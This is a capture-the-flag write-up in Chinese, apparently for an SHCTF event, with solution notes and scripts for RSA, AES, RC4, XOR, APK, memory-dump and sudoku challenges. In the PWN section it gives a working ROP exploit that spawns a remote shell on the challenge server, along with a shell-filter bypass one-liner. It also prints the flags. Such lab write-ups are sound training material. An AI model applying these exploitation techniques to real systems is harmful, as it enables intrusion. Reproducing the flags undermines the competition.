Crypto
说山河这个难度像newstar第2周,不过newstar第2周也不难
EzAES
AES_CBC有key,有iv
Hello Crypto
略,newstar第1周的题
baby_mod
关于模,RSA给出hint : leak = p*r-q*t-tmp,由于tmp很小只有16位可以爆破,模t后得到leak+tmp =p*r mod t,两边再除掉r(乘逆)就是p
tmp = 1<<12
while tmp<(1<<15):
tmp = next_prime(tmp)
p = (leak+tmp)%t * invert(r,t)%t
if isPrime(p):
print(p, long_to_bytes(pow(c,invert(65537,p-1),p)))
#break
#(leak_tmp)%r = -qt%r = -q + t%r
#SHCTF{992cd020-c077-4322-b725-42abb07351c8}
d_known
已知d求n,由于 e*d = 1 + k*phi当很小时k也会很小,可以爆破。如果e很大可以用更快的方法。
ed1 = e*d - 1
for k in range(1, e):
if ed1%k == 0:
#print(k)
tphi = ed1//k
tp = iroot(tphi,2)[0]
tp = next_prime(tp)
tq = tphi//(tp-1)+1
if tphi%(tp-1) == 0 and isPrime(tq):
n = tp*tq
m = pow(c,d,tp*tq)
print(long_to_bytes(m))
factor
先用yafu爆破出因子,再求这些因子的组合。
c = 18946548191938794864120361152574240388523945335296788837228348770322181581321602403615828138512043894011421076284003608755553490004627
N = 226135023770816618701618151846421847572902900031980838045326364286384135892650486405452233420434737106090920032098983593807060471503312296505342841682345021773470258125278766612640823497674061
'''
P20 = 17166246869917049249
P20 = 17777149920361894319
P20 = 18396972868824670501
P19 = 9295485268086191407
P20 = 12446738783004209609
P19 = 9382735014592024387
P20 = 11432032909142176543
P20 = 11809257221756593327
P20 = 15184368613455131963
P20 = 18100230049134917857
'''
ps = [17166246869917049249,17777149920361894319,18396972868824670501,9295485268086191407,12446738783004209609,9382735014592024387,11432032909142176543,11809257221756593327,15184368613455131963,18100230049134917857]
for i in range(1024):
a = bin(i)[2:].zfill(10)
if a.count('1') != 7: continue
phi = 1
n = 1
for k in range(10):
if a[k] == '1':
phi *= ps[k]-1
n *= ps[k]
d = invert(65537,phi)
m = pow(c,d,n)
flag = long_to_bytes(m)
if b'SHCTF' in flag:
print(flag)
PWN
指令执行器
同newstar week asm那题shell里作个syscall
签个到吧
命令过滤绕过: /bin/c?t fla?>&0
No stack overflow1
溢出到后门
No stack overflow2
溢出先泄露libc再system(/bin/sh)
No stack overflow2 pro
有syscall先读入/bin/sh再execve
from pwn import *
context(arch='amd64', log_level='debug')
elf = ELF('./vuln5')
pop_rdi = 0x00000000004022bf # pop rdi ; ret
pop_rsi = 0x000000000040a32e # pop rsi ; ret
pop_rdx = 0x000000000049d06b # pop rdx ; pop rbx ; ret
pop_rax = 0x00000000004507f7 # pop rax ; ret
syscall = 0x44f409
bss = 0x4e8d00
p = remote('entry.shc.tf', 43778)
p.sendlineafter(b"size: \n", str(0x80000100).encode())
p.sendafter(b"input: \n", b'A'*0x100+ flat(0, pop_rdi, 0, pop_rsi, bss, pop_rdx,8,0, pop_rax,0, syscall, pop_rdi,bss, pop_rsi,0, pop_rdx,0,0, pop_rax, 59, syscall))
sleep(0.5)
p.send(b'/bin/sh\0')
p.interactive()
REV
EzDBG
这题有点意思,先是作不出来,然后问了出题人,说是弄难了,然后更新了附件,就OK了。
题目给的是个dmp文件,这是内存dump出来的文件,有点像取证题,用010EDIT可以看到块和位置。有6个module里边存着名字没啥用,下边memory64List是块和偏移,通过这里可以从文件中切出块。这些块实际上是程序运行生成的,所以里边会存着程序信息。(一个程序会包含多个连续的块)
块22里找到显示的输入flag提示,前边块21是程序部分,拿去IDA反编译。得到加密方法是异或66
'''
#发现加密方法是flag^0x66,从dmp文件里搜加密后的密文
>>> xor(b'SHCTF{',b'\x66')
b'5.%2 \x1d'
在 0x1715c9 找到密文 然后解密
'''
print(xor(msg[0x1715c9:0x1715c9+39],b'\x66'))
#b'SHCTF{e8a0fe1156f2afaafe6d788e9d0e1f66}'
ezapk
得到加密方法
public static String Encode(String str, byte[] bArr) {
StringBuilder sb = new StringBuilder();
for (int i = 0; i < str.length(); i++) {
sb.append((char) (((char) (((char) (str.charAt(i) ^ bArr[i % bArr.length])) + 6)) * 2));
}
return Base64.getEncoder().encodeToString(sb.toString().getBytes(StandardCharsets.UTF_8));
}
解出一堆乱码,提交居然正确
key = [12,15,25,30,36]
a = "woLDgMOgw7hEwoJQw7zDtsKow7TDpMOMZMOow75QxIbDnsKmw6Z4UMK0w7rCklDCrMKqwqbDtMOOw6DDsg=="
a = b64decode(a).decode('utf-8')
bytes([(ord(a[i])//2-6)^key[i%5] for i in range(len(a))])
#7Ush87-akjxcy2Ju-dwia9;JSO-IQixnsm
#一堆乱码居然正确
#SHCTF{7Ush87-akjxcy2Ju-dwia9;JSO-IQixnsm}
ezrc4
RC4是拿流来异或明文,解密相同。得到已知明文对应的密文就能异或得到加密流,然后再异或密文就能拿到明文
ezxor
#sub_140014C50()
v9 = [-61,105,114,-60,103,74,-24,17,67,-49,111,0,-13,68,110,-8,89,73,-24,78,94,-30,83,67,-79,92]
x = [0x90,0x21,0x31]
bytes([((v9[i])^x[i%3])&0xff for i in range(26)])
bytes([((v9[i]&0xff)^x[i%3]) for i in range(26)])
#SHCTF{x0r_N1ce_hxxxoorrr!}
gamegame
是个数独,sagemath里有解数独函数
msg = open('r5_sudoku.exe','rb').read()[0x2600: 0x2600+4*81]
sd = [msg[i] for i in range(0, 4*81,4)]
sd = [5, 3, 0, 0, 7, 0, 0, 0, 0, 6, 0, 0, 1, 9, 5, 0, 0, 0, 0, 9, 8, 0, 0, 0, 0, 6, 0, 8, 0, 0, 0, 6, 0, 0, 0, 3, 4, 0, 0, 8, 0, 3, 0, 0, 1, 7, 0, 0, 0, 2, 0, 0, 0, 6, 0, 6, 0, 0, 0, 0, 2, 8, 0, 0, 0, 0, 4, 1, 9, 0, 0, 5, 0, 0, 0, 0, 8, 0, 0, 7, 9]
'''
[5 3 4 6 7 8 9 1 2]
[6 7 2 1 9 5 3 4 8]
[1 9 8 3 4 2 5 6 7]
[8 5 9 7 6 1 4 2 3]
[4 2 6 8 5 3 7 9 1]
[7 1 3 9 2 4 8 5 6]
[9 6 1 5 3 7 2 8 4]
[2 8 7 4 1 9 6 3 5]
[3 4 5 2 8 6 1 7 9]
'''
a = '534678912672195348198342567859761423426853791713924856961537284287419635345286179'
b = ''.join([a[i] for i in range(81) if sd[i]==0])
#shctf{468912723481342575971422657913948591537428763345261}